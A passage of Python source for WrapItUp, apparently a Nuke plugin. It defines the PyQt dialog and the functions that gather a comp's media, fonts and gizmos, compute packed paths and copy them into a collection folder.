self.LWebsite.setOpenExternalLinks(True)
self.LWebsite.setObjectName("LWebsite")
self.LPath = QtWidgets.QLabel(Dialog)
self.LPath.setGeometry(QtCore.QRect(20, 20, 781, 16))
self.LPath.setObjectName("LPath")
self.LFiles = QtWidgets.QLabel(Dialog)
self.LFiles.setGeometry(QtCore.QRect(20, 760, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LFiles.setFont(font)
self.LFiles.setObjectName("LFiles")
self.CurrItemFiles = QtWidgets.QLabel(Dialog)
self.CurrItemFiles.setGeometry(QtCore.QRect(150, 760, 771, 16))
self.CurrItemFiles.setObjectName("CurrItemFiles")
self.TotalProgress = QtWidgets.QProgressBar(Dialog)
self.TotalProgress.setEnabled(True)
self.TotalProgress.setGeometry(QtCore.QRect(370, 830, 161, 23))
self.TotalProgress.setProperty("value", 0)
self.TotalProgress.setTextVisible(True)
self.TotalProgress.setOrientation(QtCore.Qt.Horizontal)
self.TotalProgress.setInvertedAppearance(False)
self.TotalProgress.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.TotalProgress.setObjectName("TotalProgress")
self.Refresh = QtWidgets.QPushButton(Dialog)
self.Refresh.setGeometry(QtCore.QRect(800, 660, 75, 23))
self.Refresh.setAutoDefault(False)
self.Refresh.setObjectName("Refresh")
self.Start = QtWidgets.QPushButton(Dialog)
self.Start.setGeometry(QtCore.QRect(710, 830, 75, 23))
self.Start.setAutoDefault(False)
self.Start.setObjectName("Start")
self.Interrupt = QtWidgets.QPushButton(Dialog)
self.Interrupt.setGeometry(QtCore.QRect(800, 830, 75, 23))
self.Interrupt.setAutoDefault(False)
self.Interrupt.setObjectName("Interrupt")
self.LSize = QtWidgets.QLabel(Dialog)
self.LSize.setGeometry(QtCore.QRect(20, 780, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LSize.setFont(font)
self.LSize.setObjectName("LSize")
self.CurrItemSize = QtWidgets.QLabel(Dialog)
self.CurrItemSize.setGeometry(QtCore.QRect(150, 780, 771, 16))
self.CurrItemSize.setObjectName("CurrItemSize")
self.LTotalCopySize = QtWidgets.QLabel(Dialog)
self.LTotalCopySize.setGeometry(QtCore.QRect(560, 830, 71, 21))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LTotalCopySize.setFont(font)
self.LTotalCopySize.setObjectName("LTotalCopySize")
self.TotalCopySize = QtWidgets.QLabel(Dialog)
self.TotalCopySize.setGeometry(QtCore.QRect(640, 830, 71, 21))
self.TotalCopySize.setObjectName("TotalCopySize")
self.IgnoredLabel = QtWidgets.QLabel(Dialog)
self.IgnoredLabel.setGeometry(QtCore.QRect(20, 700, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.IgnoredLabel.setFont(font)
self.IgnoredLabel.setToolTip("")
self.IgnoredLabel.setObjectName("IgnoredLabel")
self.CurrentCopyItem = QtWidgets.QLabel(Dialog)
self.CurrentCopyItem.setGeometry(QtCore.QRect(370, 800, 161, 21))
self.CurrentCopyItem.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.CurrentCopyItem.setObjectName("CurrentCopyItem")
self.GoToFolder = QtWidgets.QPushButton(Dialog)
self.GoToFolder.setEnabled(False)
self.GoToFolder.setGeometry(QtCore.QRect(20, 660, 75, 23))
self.GoToFolder.setAutoDefault(False)
self.GoToFolder.setObjectName("GoToFolder")
self.ItemProgress = QtWidgets.QProgressBar(Dialog)
self.ItemProgress.setEnabled(True)
self.ItemProgress.setGeometry(QtCore.QRect(370, 800, 161, 23))
self.ItemProgress.setProperty("value", 0)
self.ItemProgress.setTextVisible(False)
self.ItemProgress.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.ItemProgress.setObjectName("ItemProgress")
self.SettingPages = QtWidgets.QTabWidget(Dialog)
self.SettingPages.setGeometry(QtCore.QRect(20, 90, 861, 111))
self.SettingPages.setObjectName("SettingPages")
self.MainSettings = QtWidgets.QWidget()
self.MainSettings.setObjectName("MainSettings")
self.RelinkPaths = QtWidgets.QCheckBox(self.MainSettings)
self.RelinkPaths.setGeometry(QtCore.QRect(20, 20, 271, 17))
self.RelinkPaths.setCheckable(True)
self.RelinkPaths.setChecked(True)
self.RelinkPaths.setObjectName("RelinkPaths")
self.RelativeRelink = QtWidgets.QCheckBox(self.MainSettings)
self.RelativeRelink.setEnabled(True)
self.RelativeRelink.setGeometry(QtCore.QRect(20, 40, 321, 17))
self.RelativeRelink.setChecked(True)
self.RelativeRelink.setObjectName("RelativeRelink")
self.LParentDirectories = QtWidgets.QLabel(self.MainSettings)
self.LParentDirectories.setGeometry(QtCore.QRect(510, 40, 191, 21))
self.LParentDirectories.setObjectName("LParentDirectories")
self.ParentDirectories = QtWidgets.QSpinBox(self.MainSettings)
self.ParentDirectories.setGeometry(QtCore.QRect(460, 40, 41, 21))
self.ParentDirectories.setSuffix("")
self.ParentDirectories.setPrefix("")
self.ParentDirectories.setMinimum(1)
self.ParentDirectories.setMaximum(99)
self.ParentDirectories.setProperty("value", 3)
self.ParentDirectories.setObjectName("ParentDirectories")
self.NodeNameFolder = QtWidgets.QCheckBox(self.MainSettings)
self.NodeNameFolder.setGeometry(QtCore.QRect(460, 20, 271, 17))
self.NodeNameFolder.setChecked(True)
self.NodeNameFolder.setObjectName("NodeNameFolder")
self.SettingPages.addTab(self.MainSettings, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.CopyFontDir = QtWidgets.QCheckBox(self.tab)
self.CopyFontDir.setGeometry(QtCore.QRect(20, 20, 271, 17))
self.CopyFontDir.setChecked(True)
self.CopyFontDir.setObjectName("CopyFontDir")
self.CopyGizmos = QtWidgets.QCheckBox(self.tab)
self.CopyGizmos.setGeometry(QtCore.QRect(20, 40, 271, 17))
self.CopyGizmos.setChecked(True)
self.CopyGizmos.setObjectName("CopyGizmos")
self.SettingPages.addTab(self.tab, "")
self.Misc = QtWidgets.QWidget()
self.Misc.setObjectName("Misc")
self.ContinueOnError = QtWidgets.QCheckBox(self.Misc)
self.ContinueOnError.setGeometry(QtCore.QRect(20, 20, 171, 17))
self.ContinueOnError.setChecked(True)
self.ContinueOnError.setTristate(False)
self.ContinueOnError.setObjectName("ContinueOnError")
self.ExitOnFinish = QtWidgets.QCheckBox(self.Misc)
self.ExitOnFinish.setGeometry(QtCore.QRect(20, 40, 171, 17))
self.ExitOnFinish.setChecked(False)
self.ExitOnFinish.setTristate(False)
self.ExitOnFinish.setObjectName("ExitOnFinish")
self.CSVSeparator = QtWidgets.QComboBox(self.Misc)
self.CSVSeparator.setGeometry(QtCore.QRect(460, 18, 41, 22))
self.CSVSeparator.setObjectName("CSVSeparator")
self.CSVSeparator.addItem("")
self.CSVSeparator.addItem("")
self.LCSVSeparator = QtWidgets.QLabel(self.Misc)
self.LCSVSeparator.setGeometry(QtCore.QRect(510, 18, 191, 21))
self.LCSVSeparator.setObjectName("LCSVSeparator")
self.License = QtWidgets.QComboBox(self.Misc)
self.License.setGeometry(QtCore.QRect(460, 38, 41, 22))
self.License.setObjectName("License")
self.License.addItem("")
self.License.addItem("")
self.LLicense = QtWidgets.QLabel(self.Misc)
self.LLicense.setGeometry(QtCore.QRect(510, 38, 191, 21))
self.LLicense.setObjectName("LLicense")
self.SettingPages.addTab(self.Misc, "")
self.GoToRootFolder = QtWidgets.QPushButton(Dialog)
self.GoToRootFolder.setGeometry(QtCore.QRect(810, 70, 75, 23))
self.GoToRootFolder.setAutoDefault(False)
self.GoToRootFolder.setObjectName("GoToRootFolder")
self.GoToNode = QtWidgets.QPushButton(Dialog)
self.GoToNode.setEnabled(False)
self.GoToNode.setGeometry(QtCore.QRect(100, 660, 75, 23))
self.GoToNode.setAutoDefault(False)
self.GoToNode.setObjectName("GoToNode")
self.ItemProgress.raise_()
self.ListCopyPaths.raise_()
self.ListIgnorePaths.raise_()
self.SendToIgnore.raise_()
self.SendToCopy.raise_()
self.PackedPath.raise_()
self.ChoosePackedPathButton.raise_()
self.LCopy.raise_()
self.LIgnore.raise_()
self.LCurrItemItemPath.raise_()
self.LPackedItemPath.raise_()
self.CurrItemPath.raise_()
self.PackedItemPath.raise_()
self.LWebsite.raise_()
self.LPath.raise_()
self.LFiles.raise_()
self.CurrItemFiles.raise_()
self.TotalProgress.raise_()
self.Refresh.raise_()
self.Start.raise_()
self.Interrupt.raise_()
self.LSize.raise_()
self.CurrItemSize.raise_()
self.LTotalCopySize.raise_()
self.TotalCopySize.raise_()
self.IgnoredLabel.raise_()
self.CurrentCopyItem.raise_()
self.GoToFolder.raise_()
self.SettingPages.raise_()
self.GoToRootFolder.raise_()
self.GoToNode.raise_()
self.retranslateUi(Dialog)
self.SettingPages.setCurrentIndex(0)
self.CSVSeparator.setCurrentIndex(0)
self.License.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "WrapItUp - Max van Leeuwen"))
self.ListCopyPaths.setToolTip(_translate("Dialog", "<html><head/><body><p>The found items that will be copied to the specified collection path.</p></body></html>"))
self.ListIgnorePaths.setToolTip(_translate("Dialog", "<html><head/><body><p>The found items that will not be copied to the specified collection path.</p></body></html>"))
self.SendToIgnore.setToolTip(_translate("Dialog", "Ignore selected items on the left."))
self.SendToIgnore.setText(_translate("Dialog", ">>"))
self.SendToCopy.setToolTip(_translate("Dialog", "Stop ignoring selected items on the right."))
self.SendToCopy.setText(_translate("Dialog", "<<"))
self.PackedPath.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.ChoosePackedPathButton.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.ChoosePackedPathButton.setText(_translate("Dialog", "folder"))
self.LCopy.setText(_translate("Dialog", "copy"))
self.LIgnore.setText(_translate("Dialog", "ignore"))
self.LCurrItemItemPath.setToolTip(_translate("Dialog", "Current path of the selected item."))
self.LCurrItemItemPath.setText(_translate("Dialog", "current item path"))
self.LPackedItemPath.setToolTip(_translate("Dialog", "<html><head/><body><p>Preview of the selected item\'s new path - after it is collected.</p></body></html>"))
self.LPackedItemPath.setText(_translate("Dialog", "packed item path"))
self.CurrItemPath.setText(_translate("Dialog", "-"))
self.PackedItemPath.setText(_translate("Dialog", "-"))
self.LWebsite.setToolTip(_translate("Dialog", "My website!"))
self.LWebsite.setText(_translate("Dialog", "<html><head/><body><p><a href=\"https://maxvanleeuwen.com/WrapItUp\"><span style=\" text-decoration: underline; color:#6bd5ff;\">maxvanleeuwen.com/WrapItUp</span></a></p></body></html>"))
self.LPath.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.LPath.setText(_translate("Dialog", "collection folder:"))
self.LFiles.setToolTip(_translate("Dialog", "<html><head/><body><p>File/frame count of the selected item.</p></body></html>"))
self.LFiles.setText(_translate("Dialog", "files"))
self.CurrItemFiles.setText(_translate("Dialog", "-"))
self.TotalProgress.setToolTip(_translate("Dialog", "<html><head/><body><p>Total progress.</p></body></html>"))
self.Refresh.setToolTip(_translate("Dialog", "<html><head/><body><p>Recheck the current Nuke script for media and other files to collect.</p></body></html>"))
self.Refresh.setText(_translate("Dialog", "refresh"))
self.Start.setToolTip(_translate("Dialog", "<html><head/><body><p>Start with the current settings.<br/>One final confirmation will be shown.</p></body></html>"))
self.Start.setText(_translate("Dialog", "start..."))
self.Interrupt.setToolTip(_translate("Dialog", "<html><head/><body><p>Stop/exit.</p></body></html>"))
self.Interrupt.setText(_translate("Dialog", "interrupt"))
self.LSize.setToolTip(_translate("Dialog", "<html><head/><body><p>Size of the selected item.</p></body></html>"))
self.LSize.setText(_translate("Dialog", "size"))
self.CurrItemSize.setText(_translate("Dialog", "-"))
self.LTotalCopySize.setToolTip(_translate("Dialog", "Total size of all files to be copied."))
self.LTotalCopySize.setText(_translate("Dialog", "total size"))
self.TotalCopySize.setToolTip(_translate("Dialog", "Total size of all files to be copied."))
self.TotalCopySize.setText(_translate("Dialog", "0"))
self.IgnoredLabel.setText(_translate("Dialog", "ignored!"))
self.CurrentCopyItem.setText(_translate("Dialog", "item loading..."))
self.GoToFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Go to the folder of the currently selected item.<br/><br/>alt/option+shift+r</p></body></html>"))
self.GoToFolder.setText(_translate("Dialog", "open folder"))
self.GoToFolder.setShortcut(_translate("Dialog", "Alt+Shift+R"))
self.ItemProgress.setToolTip(_translate("Dialog", "<html><head/><body><p>Item progress.</p></body></html>"))
self.RelinkPaths.setToolTip(_translate("Dialog", "<html><head/><body><p>Make another copy of the Nuke script in which all nodes that have their media copied over will be relinked.</p></body></html>"))
self.RelinkPaths.setText(_translate("Dialog", "make nuke script copy, relinked"))
self.RelativeRelink.setToolTip(_translate("Dialog", "<html><head/><body><p>Make another copy of the Nuke script in which all nodes that have their media copied over will be relinked using the following path prefix: [python {nuke.script_directory()}]<br/><br/>This way, the nuke script will keep working, even if it has been moved to a different location/machine - as long as the media files are right next to it.</p></body></html>"))
self.RelativeRelink.setText(_translate("Dialog", "make nuke script copy, relative relinked"))
self.LParentDirectories.setToolTip(_translate("Dialog", "<html><head/><body><p>The number of (empty) parent directories to copy over for each found media item.<br/><br/>For instance:<br/>An image sequence in /path/to/image/files/file_####.exr with a parent directory count of 3 will have the following destination in the final collected path:<br/><br/>../MEDIA/image/files/file_####.exr<br/><br/><br/>If the \'place media in folder with node name\' checkbox is unchecked, do not make this number too small.<br/>Files with same-name parent directories might end up overwriting or merging together.</p></body></html>"))
self.LParentDirectories.setText(_translate("Dialog", "parent directories"))
self.ParentDirectories.setToolTip(_translate("Dialog", "<html><head/><body><p>The number of (empty) parent directories to copy over for each found media item.<br/><br/>For instance:<br/>An image sequence in /path/to/image/files/file_####.exr with a parent directory count of 3 will have the following destination in the final collected path:<br/><br/>../MEDIA/image/files/file_####.exr<br/><br/><br/>If the \'place media in folder with node name\' checkbox is unchecked, do not make this number too small.<br/>Files with same-name parent directories might end up overwriting or merging together.</p></body></html>"))
self.NodeNameFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Place all media items in a subfolder with its corresponding node as that folder\'s name.<br/><br/>This helps finding which media belonged to which node in the new comp, and it is an extra measure against the kind of problems that could arise when parent folders of different media items have the same names.</p></body></html>"))
self.NodeNameFolder.setText(_translate("Dialog", "place media in folder with node name"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.MainSettings), _translate("Dialog", "media"))
self.CopyFontDir.setToolTip(_translate("Dialog", "<html><head/><body><p>If the current Nuke script has a custom Project Font Path set in Settings > Node, collect this directory.</p></body></html>"))
self.CopyFontDir.setText(_translate("Dialog", "copy font directory (if any)"))
self.CopyGizmos.setToolTip(_translate("Dialog", "<html><head/><body><p>If custom gizmos are used in this Nuke script, collect them and generate an init.py and menu.py file that installs them on a different machine.<br/><br/>This function does not work for all gizmos, as they can be dependent on other files.<br/>This does not work for plugins (.dll, .so, .dylib).</p></body></html>"))
self.CopyGizmos.setText(_translate("Dialog", "copy gizmos"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.tab), _translate("Dialog", "add-ons"))
self.ContinueOnError.setToolTip(_translate("Dialog", "<html><head/><body><p>Continue copying if an error occurs.<br/>If there are errors, check the log.txt file generated in the selected root folder.</p></body></html>"))
self.ContinueOnError.setText(_translate("Dialog", "continue on error"))
self.ExitOnFinish.setToolTip(_translate("Dialog", "<html><head/><body><p>Close Nuke entirely when the copying process is finished (or on error, if \'continue on error\' is disabled).<br/><br/>Useful for machines that are licensed using a limited number of floating licenses on a license server.</p></body></html>"))
self.ExitOnFinish.setText(_translate("Dialog", "exit nuke on finish"))
self.CSVSeparator.setToolTip(_translate("Dialog", "<html><head/><body><p>Set the log file\'s CSV column separator.</p></body></html>"))
self.CSVSeparator.setItemText(0, _translate("Dialog", ";"))
self.CSVSeparator.setItemText(1, _translate("Dialog", ","))
self.LCSVSeparator.setToolTip(_translate("Dialog", "<html><head/><body><p>Set the log file\'s CSV column separator.</p></body></html>"))
self.LCSVSeparator.setText(_translate("Dialog", "CSV separator"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.Misc), _translate("Dialog", "misc"))
self.License.setToolTip(_translate("Dialog", "<html><head/><body><p>Use this flag internally when running Nuke in command-line (when relinking).<br/>The -t flag uses a nuke_r license, the -ti flag uses a nuke_i license.</p></body></html>"))
self.License.setItemText(0, _translate("Dialog", "-t"))
self.License.setItemText(1, _translate("Dialog", "-ti"))
self.LLicense.setToolTip(_translate("Dialog", "<html><head/><body><p>Use this flag internally when running Nuke in command-line (when relinking).<br/>The -t flag uses a nuke_r license, the -ti flag uses a nuke_i license.</p></body></html>"))
self.LLicense.setText(_translate("Dialog", "relink license"))
self.GoToRootFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Open the currently selected folder.</p></body></html>"))
self.GoToRootFolder.setText(_translate("Dialog", "open folder"))
self.GoToNode.setToolTip(_translate("Dialog", "<html><head/><body><p>Go to the folder of the currently selected item.<br/><br/>alt/option+shift+r</p></body></html>"))
self.GoToNode.setText(_translate("Dialog", "go to node"))
# END OF EMBEDDED UI
# import necessary modules
import sys
import nuke
import shutil
import threading
import os
import glob
import re
import subprocess
import webbrowser
import time
# globals
WIU_PackedPath = ''
WIU_Interrupted = False
WIU_TotalSize = 0
WIU_Copying = False
WIU_ProjectDir = False
WIU_Relink = True
WIU_RelinkRelative = True
WIU_Gizmo = True
WIU_Fonts = True
WIU_ParentDirCount = 3
WIU_NodeNameFolder = True
WIU_AppPath = ''
WIU_SilentReturn = []
WIU_SilentList = []
WIU_MediaDataNotIgnored = []
# bytes to readable string
def BytesToString(B):
B = float(B)
KB = float(1024)
MB = float(KB ** 2) # 1.048.576
GB = float(KB ** 3) # 1.073.741.824
TB = float(KB ** 4) # 1.099.511.627.776
if B < KB:
return '{0} {1}'.format(B, 'B')
elif KB <= B < MB:
return '{0:.2f} KB'.format(B/KB)
elif MB <= B < GB:
return '{0:.2f} MB'.format(B/MB)
elif GB <= B < TB:
return '{0:.2f} GB'.format(B/GB)
elif TB <= B:
return '{0:.2f} TB'.format(B/TB)
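# usage example: BytesToString(1536) returns '1.50 KB', BytesToString(5 * 1024 ** 3) returns '5.00 GB'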
def evalTCL(text):
val = ''
try:
val = nuke.tcl("[return \"" + text + "\"]")
except Exception as e:
# TCL not working for this string
pass
# only allow string type to be returned
if type(val) is not str:
val = text
return val
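# example (hypothetical knob value): evalTCL('[python {nuke.script_directory()}]/renders/comp_v01.exr')
# lets nuke.tcl() resolve the bracketed expression to the script's directory, while a plain path string
# without TCL/python expressions comes back unchanged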
def _Start(silent = False, nk = '', startnow = False, out = '', nodenamefolder = True, parentdircount = 3, relinked = True, relativerelinked = True, media = True, fonts = True, gizmos = True, csvcommas = False, licinteractive = False):
# reset list
global WIU_SilentList
WIU_SilentList = []
# add project directory to start of path (or get project dir path)
def ProjectDirectory(pth = ''):
# set global projectdir
global WIU_ProjectDir
WIU_ProjectDir = True
# get project directory
projectdir = nuke.root()['project_directory'].getValue()
# remove double slash
if projectdir.endswith('/') and pth.startswith('/'):
projectdir = projectdir[:-1]
# stitch together
pth = projectdir + pth
return pth
# returns all paths one file knob could refer to
def GetRealKnobPaths(knobPath):
# container for all found paths in sequence
paths = []
# all versions of knobPath (stereo views, %v)
viewFiles = []
# project directory relative path
projectdir = False
# check if stereo files are used
if r'%v' in knobPath or r'%V' in knobPath:
# get all stereo views in the comp
viewRtn = nuke.root().knob('views').toScript()
for rtn in viewRtn.split('\n'):
# get each view name in the nuke comp
view = rtn.split(' ')[-2]
# replace in path and append to viewfiles
viewFiles.append(knobPath.replace(r'%v', view).replace(r'%V', view))
# if not, do not replace anything
else:
viewFiles = [knobPath]
# overwrite knobPath value with new value per view
for knobPath in viewFiles:
# get TCL evaluated string
knobPathTCL = evalTCL(knobPath)
# get parent directory
knobPathParentDir = os.path.dirname(knobPathTCL)
# try appending project root folder, if the dir does not exist
if not os.path.exists(knobPathParentDir):
knobPath_projectdir = ProjectDirectory(knobPathParentDir)
if os.path.isdir(knobPath_projectdir):
projectdir = True
knobPathParentDir = knobPath_projectdir
knobPathTCL = ProjectDirectory(knobPathTCL)
# check if the parent dir exists
if os.path.exists(knobPathParentDir):
# if it does, get the filename
filename = knobPathTCL.split('/')[-1]
# get number from printf notation as int
printfCount = -1
try:
# regex pattern for printf notation (only get first result of found printf notations)
regex = re.compile('%..d')
regexFile = regex.findall(filename)[0]
printfCount = int(regexFile[1:-1])
except Exception as e:
# no printf used
pass
# if printf notation is used for the sequence
if printfCount > 0:
# make wildcard string (e.g. '????') for glob with same length as #
wildcards = ''
for i in range(printfCount):
wildcards += '?'
wildcardPath = knobPathTCL.replace(regexFile, wildcards)
# get all files in directory
files = glob.glob(wildcardPath)
for eachFile in files:
paths.append(eachFile.replace('\\', '/'))
# if hash notation is used for the sequence
elif '#' in filename:
# split by #
filenameSplit = filename.split('#')
# count amount of #
wildcardCount = len(filenameSplit) - 2
# make wildcard string (e.g. '????') for glob with same length as #
wildcards = ''
for i in range(wildcardCount + 1):
wildcards += '?'
# get full filename with wildcard replaced
filename = filenameSplit[ -len(filenameSplit) ] + wildcards + filenameSplit[ -1 ]
# full file path
wildcardPath = os.path.join(knobPathParentDir, filename).replace('\\', '/')
# get all files that match wildcard pattern
files = glob.glob(wildcardPath)
for eachFile in files:
paths.append(eachFile.replace('\\', '/'))
# if not a sequence
else:
# append this file to paths, if it exists
if os.path.isfile(knobPathTCL):
paths.append(knobPathTCL)
# check if it is a relative (project directory) path
elif os.path.isfile(ProjectDirectory(knobPathTCL)):
paths.append(ProjectDirectory(knobPathTCL))
# return result
return [paths, projectdir]
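# worked example (hypothetical file layout): a knob value of '/shots/sh010/plate.%04d.exr' takes the
# printf branch above, '%04d' is replaced by the glob pattern '????', and glob.glob() returns every
# matching frame on disk; 'plate.####.exr' takes the hash branch and ends up as the same 4-character wildcard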
# function to shorten a path to where it can be appended to the chosen packed media directory path
def PackedPath(fullPath, i = 0, nodeName = '', fontFolder = '', project_dir = False, settingFontPath = False):
global WIU_NodeNameFolder
global WIU_ParentDirCount
# set node name folder to argument if the UI is not loaded
if silent:
WIU_NodeNameFolder = nodenamefolder
WIU_ParentDirCount = parentdircount
# TCL eval
fullPath = evalTCL(fullPath)
# media (default)
if i == 0:
# get amount of parent directories
parentDirCount = WIU_ParentDirCount
# split into parent dirs
splitPath = fullPath.split('/')
splitCleanPath = []
for s in splitPath:
if s != '':
splitCleanPath.append(s)
# build shortened path (do not add / at the end of the path)
newPath = (nodeName + '/') if (WIU_NodeNameFolder and not project_dir) else ''
# cap the parent dir count at the number of available path components (and use the full path when the current media is relative to the project directory)
if parentDirCount > len(splitCleanPath) or project_dir:
parentDirCount = len(splitCleanPath)
for c in range(parentDirCount):
newPath += splitCleanPath[ len(splitCleanPath) - (parentDirCount - c) ] + ('/' if not c == parentDirCount - 1 else '')
if project_dir:
newPath = newPath.replace(ProjectDirectory(), '')
# sanitise string
illegalChars = ':<>$?!;\'\"\\`*|'
for c in illegalChars:
newPath = newPath.replace(c, '_')
subdir = 'MEDIA'
if project_dir:
subdir = 'PROJECT_DIRECTORY'
newPath = WIU_PackedPath + '/' + subdir + '/' + newPath
return newPath
fileName = fullPath.split('/')[-1]
# nuke script
if i == -1:
newPath = WIU_PackedPath + '/' + fullPath.split('/')[-1]
return newPath
# nuke script relinked
if i == -2:
newPath = WIU_PackedPath + '/' + os.path.splitext( fileName )[0] + '_RELINKED.nk'
return newPath
# nuke script relinked relative
if i == -3:
newPath = WIU_PackedPath + '/' + os.path.splitext( fileName )[0] + '_RELINKED-RELATIVE.nk'
return newPath
# font directory
if i == -4:
newPath = WIU_PackedPath + '/' + 'FONTS' + '/' + fontFolder.split('/')[-1] + ( ('/' + fullPath.split('/')[-1]) if not settingFontPath else '')
return newPath
# gizmo
if i <= -5:
newPath = WIU_PackedPath + '/' + 'GIZMOS/Collected' + '/' + os.path.splitext( fileName )[0] + '/' + fileName
return newPath
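# worked example (hypothetical paths): with the defaults (3 parent directories, node name folders on),
# a Read node 'Read1' pointing at '/jobs/show/sh010/scan/plate.0001.exr' is packed to
# '<WIU_PackedPath>/MEDIA/Read1/sh010/scan/plate.0001.exr'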
# gets all file knobs in the comp file and runs them through GetRealKnobPaths() - returns results
def ReadCompMediaData():
# progress bar total value
prTotal = len(nuke.allNodes(recurseGroups=True))
# container for all loaded files
readFiles = []
# collect all knobs with files in them
iNode = 0
for eachNode in nuke.allNodes(recurseGroups=True):
for eachKnob in eachNode.knobs():
currKnob = eachNode[eachKnob]
if currKnob.Class() == 'File_Knob':
# only add if a path has been entered
foundPath = currKnob.getValue()
if foundPath != '':
# get real paths (file path list + project dir bool)
RealKnobPathsResult = GetRealKnobPaths(foundPath)
realKnobPaths = RealKnobPathsResult[0]
projectdir = RealKnobPathsResult[1]
# make new list for new paths with their per-file size included
allFilesWithSizes = []
# get total file size
totalSize = 0
for eachFile in realKnobPaths:
size = os.path.getsize(eachFile)
totalSize += size
allFilesWithSizes.append([eachFile, size])
# check if the path exists
exists = False
if len(realKnobPaths) > 0:
exists = True
# make media item (node(s), knob(s), file exists, knob value, all paths and sizes per item, total size, is relative from project directory)
mediaItem = [[eachNode], [eachKnob], exists, foundPath, allFilesWithSizes, totalSize, projectdir]
# check if the media item has already been found via another node
existingItem = -1
i = 0
for m in readFiles:
# remember item index (should happen once at most for each check, so overwriting the previous existingItem is not an issue)
if m[4] == mediaItem[4] and m[3] == mediaItem[3]:
existingItem = i
i += 1
# append node and knob to existing item instead of appending the new item
if existingItem != -1:
readFiles[existingItem][0].append(eachNode)
readFiles[existingItem][1].append(eachKnob)
# item is new
else:
# append all data to final list
readFiles.append( mediaItem )
if not silent:
nuke.executeInMainThread(TotalProgressUpdate, args=(int(round( float(iNode) / float(prTotal) * 100 / 2 ))))
iNode += 1
# return results
return readFiles
# check if a node is a gizmo, and if so, return the full name
def isGizmo(n):
# compare type
gizmo = type(n) == nuke.Gizmo
# append .gizmo
gizmoName = n.Class() if n.Class().endswith('.gizmo') else n.Class() + '.gizmo'
# return
if gizmo:
return gizmoName
else:
return ''
# window to show when nuke should be saved first
def SaveNukeFirst():
nuke.message("Save the Nuke script first!")
window.close()
def ReadCompOtherData():
# total progress bar value
prTotal = len(nuke.allNodes(recurseGroups=True))
# all non-media data is collected here
readData = []
# get current nuke script location
NukeScript = ''
NukeScriptSize = 0
if not silent:
try:
NukeScript = nuke.root().name()
NukeScriptSize = os.path.getsize(NukeScript)
except Exception as e:
nuke.executeInMainThread(SaveNukeFirst, args=())
return False
else:
NukeScript = nk
NukeScriptSize = os.path.getsize(nk)
# item 0: nukescript
readData.append([NukeScript, NukeScriptSize])
# item 1: nukescript relinked
readData.append([NukeScript, NukeScriptSize])
# item 2: nukescript relative relinked
readData.append([NukeScript, NukeScriptSize])
# item 3: get the project font path
fontPathRaw = nuke.root()['free_type_font_path'].getValue()
fontPath = evalTCL(fontPathRaw)
totalSize = 0
# collection of all font files
fontPathsS = []
for path, subdirs, files in os.walk(fontPath):
for eachFile in files:
currFile = os.path.join(path, eachFile).replace('\\', '/')
currSize = os.path.getsize(currFile)
totalSize += currSize
fontPathsS.append([currFile, currSize])
# list with font path, total size of all files, list of font files + sizes
readData.append([fontPath, totalSize, fontPathsS])
# item 4: get all gizmos
gizmoList = []
# get each gizmo name as string
for eachNode in nuke.allNodes(recurseGroups=True):
# check if gizmo
gizmoName = isGizmo(eachNode)
# find gizmo items
if gizmoName != '':
gizmoItem = [gizmoName, [eachNode]]
# check if the gizmo was already found earlier, and if so, append only the node to the already found gizmo item
i = 0
alreadyFound = False
for g in gizmoList:
if g[0] == gizmoName:
alreadyFound = True
gizmoList[i][1].append(eachNode)
i+=1
if not alreadyFound:
gizmoList.append( gizmoItem )
# iterate through plugin paths to search for them
iNode = 0
for eachPluginPath in nuke.pluginPath():
nodeI = 0
for eachGizmo in gizmoList:
gizmoPath = os.path.join(eachPluginPath, eachGizmo[0]).replace('\\', '/')
if os.path.isfile(gizmoPath):
# list item: path to gizmo file, size of gizmo file, list of all nodes using the gizmo
readData.append( [gizmoPath, os.path.getsize(gizmoPath), eachGizmo[1]] )
nodeI += 1
if not silent:
nuke.executeInMainThread(TotalProgressUpdate, args=(int(float(iNode) / float(prTotal) * 100) + 50))
iNode += 1
return readData
# function that copies files on all platforms, and creates intermediate directories if needed
# it has some file-specific actions (writing the custom init.py file for copied gizmos, and relinking the nuke scripts)
def ProcessFile(fileFrom, fileTo, writeInit, firstInit, relinkMethod, relinkFonts):
global WIU_MediaDataNotIgnored
# caught errors to return
err = ''
try:
# create intermediate folders
ToParentFolder = os.path.dirname(fileTo)
if not os.path.isdir(ToParentFolder):
os.makedirs( ToParentFolder )
# copy file
shutil.copy2(fileFrom, fileTo)
# update init.py/menu.py file
if writeInit:
# write menu.py/init.py file - file path, is in root path (bool)
def WriteFile(fileName, root):
# which file
filePath = WIU_PackedPath + '/GIZMOS/' + ('Collected/' if not root else '') + fileName + '.py'
# try to remove it if logging just started
if firstInit:
try:
os.remove(filePath)
except Exception as e:
pass
# open file
f = open(filePath, "a+")
strText = ''
if firstInit:
strText += '# Generated by ' + WIU_Title
if root:
strText += '\n#\n# Place all contents of the /GIZMOS folder in your /user/.nuke directory to install the necessary gizmos for the collected Nuke script.\n# If an init.py file already exists in /users/.nuke, simply append the following line to that file (instead of overwriting it with this one):\n\n'
